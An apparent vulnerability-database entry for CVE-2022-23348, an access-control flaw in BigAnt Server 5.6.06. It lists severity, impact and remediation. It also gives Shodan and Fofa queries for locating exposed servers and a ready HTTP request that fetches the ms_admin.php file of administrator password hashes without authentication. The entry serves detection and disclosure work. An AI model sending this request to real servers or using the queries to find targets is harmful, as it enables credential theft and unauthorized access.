🔙 목록으로 돌아가기

CVE-2022-23348: BigAnt Server 5.6.06 - Improper Access Control

TitleBigAnt Server 5.6.06 - Improper Access Control
Authorarafatansari
SeverityMedium
ImpactUnauthenticated attackers can access the ms_admin.php file containing weak password hashes for administrative accounts, potentially facilitating password cracking and unauthorized access.
RemediationApply the latest security patches or updates provided by the vendor to fix the access control issue.
CVSS Score5.3
EPSS Score0.00828
CVE IDCVE-2022-23348
CWE IDCWE-916
Shodan Queryhttp.html:"bigant"
Fofa Querybody="bigant"
Tags cve cve2022 bigant unauth exposure bigantsoft vuln

🔍 Vulnerability Description

BigAnt Server 5.6.06 is susceptible to improper access control. The software utililizes weak password hashes. An attacker can craft a password hash and thereby possibly possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET /Runtime/Data/ms_admin.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-23348.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-23348.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A